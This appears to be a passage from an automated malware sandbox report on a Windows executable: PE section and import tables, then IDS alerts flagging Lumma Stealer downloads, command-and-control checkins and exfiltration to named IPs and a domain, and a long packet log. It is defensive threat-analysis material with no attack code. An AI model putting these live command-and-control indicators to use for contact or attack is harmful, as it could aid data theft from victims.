                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x230000x65c.reloc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1aab00x38.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a9700x140.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x130000x270.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000x112500x11400a559ce6dfe163c5e10460fac91f9759bFalse0.5678215579710145data6.4856742058874035IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rdata0x130000x9b600x9c001590a5eb5cd320a7814783eb5f5e6c9dFalse0.42988782051282054COM executable for DOS4.751431432298678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x1d0000x1c600xc00e9fd917697ef433eea404b46e3894240False0.1318359375data1.8849595949470401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .pdata0x1f0000x11340x1200b2b2c9c449210d103cd9f87cd55b23e0False0.4661458333333333data4.767539707318678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              _RDATA0x210000x1f40x2006d7220769bbd28530d55aa381ab72e09False0.49609375data3.6079009392606953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rsrc0x220000x1e00x200f754adbd7f5d6195fd6d527001cab98cFalse0.525390625data4.704363013479242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .reloc0x230000x65c0x800f46401db6fb168b3e0ca8cc9c06a3278False0.50927734375data4.885196292837239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_MANIFEST0x220600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              KERNEL32.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, RtlPcToFileHeader, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, WriteConsoleW
                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                              2024-11-07T17:55:11.639670+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.11.2049710147.45.44.13180TCP
                                                                                                                                                                                                              2024-11-07T17:55:12.108473+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.11.2049710147.45.44.13180TCP
                                                                                                                                                                                                              2024-11-07T17:55:12.109154+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass1147.45.44.13180192.168.11.2049710TCP
                                                                                                                                                                                                              2024-11-07T17:55:13.869866+01002057284ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou)1192.168.11.20514541.1.1.153UDP
                                                                                                                                                                                                              2024-11-07T17:55:14.245210+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049711104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:14.245210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049711104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:14.746759+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.11.2049711104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:14.746759+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049711104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:15.081146+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049712104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:15.081146+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049712104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:15.923601+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.11.2049712104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:15.923601+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049712104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:21.478914+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049720104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:21.478914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049720104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:22.553138+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049724104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:22.553138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049724104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:23.297760+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049725104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:23.297760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049725104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:24.379486+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049727104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:24.379486+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049727104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:25.581150+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049728104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:25.581150+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049728104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:26.470376+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049729104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:26.470376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049729104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:27.930071+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.11.2049729104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:28.150953+01002057285ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)1192.168.11.2049730104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:28.150953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049730104.21.19.177443TCP
                                                                                                                                                                                                              2024-11-07T17:55:28.686722+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049730104.21.19.177443TCP
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.312341928 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.498539925 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.498759985 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.517822027 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.703775883 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704555988 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704566002 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704685926 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704710007 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704735994 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704756021 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704762936 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704771042 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704803944 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704811096 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704818010 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704891920 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.705008030 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.705087900 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905092955 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905107021 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905117989 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905128956 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905138969 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905148983 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905158043 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905168056 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905178070 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905193090 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905196905 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905206919 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905239105 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905329943 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905389071 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905431032 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905551910 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905553102 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905553102 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905554056 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905554056 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905555010 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905555010 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905885935 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093666077 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093764067 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093777895 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093888044 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093902111 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093911886 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093930960 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.093940973 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.094006062 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.094100952 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.094207048 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.449738979 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639450073 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639487028 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639514923 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639659882 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639669895 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639714003 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639740944 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639766932 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639794111 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639811993 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639830112 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639858007 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639883041 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639889956 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639919043 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639945030 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639966011 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640019894 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640064001 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640099049 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640111923 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640150070 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640183926 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640219927 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640254974 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640296936 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.640487909 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827658892 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827722073 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827765942 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827809095 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827851057 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827881098 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827930927 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.827953100 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828067064 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828097105 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828136921 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828181028 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828222036 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828263998 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828290939 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828326941 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828371048 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828413010 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828433037 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828473091 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828506947 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828514099 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828566074 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.828655005 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.909343958 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.052866936 CET8049697204.79.197.203192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108319044 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108338118 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108354092 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108366966 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108381033 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108395100 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108407974 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108422995 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108437061 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108449936 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108464003 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108473063 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108489037 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108503103 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108516932 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108530045 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108542919 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108664036 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108702898 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108740091 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108757019 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108769894 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108783960 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108798027 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108810902 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108824015 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108838081 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108845949 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108858109 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108871937 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108885050 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108899117 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108911991 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108926058 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108978033 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108979940 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108980894 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108982086 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108983994 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108999968 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109014034 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109028101 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109030008 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109045982 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109059095 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109071970 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109085083 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109098911 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109143019 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109147072 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109147072 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109148026 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109153986 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109168053 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109180927 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109194040 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109208107 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109221935 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109235048 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109249115 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109261990 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109280109 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109303951 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109313965 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109462023 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.109589100 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308193922 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308207989 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308218956 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308393002 CET4971080192.168.11.20147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308443069 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308454990 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308465004 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308475971 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308485985 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308495045 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308505058 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308515072 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308525085 CET8049710147.45.44.131192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.308535099 CET8049710147.45.44.131192.168.11.20
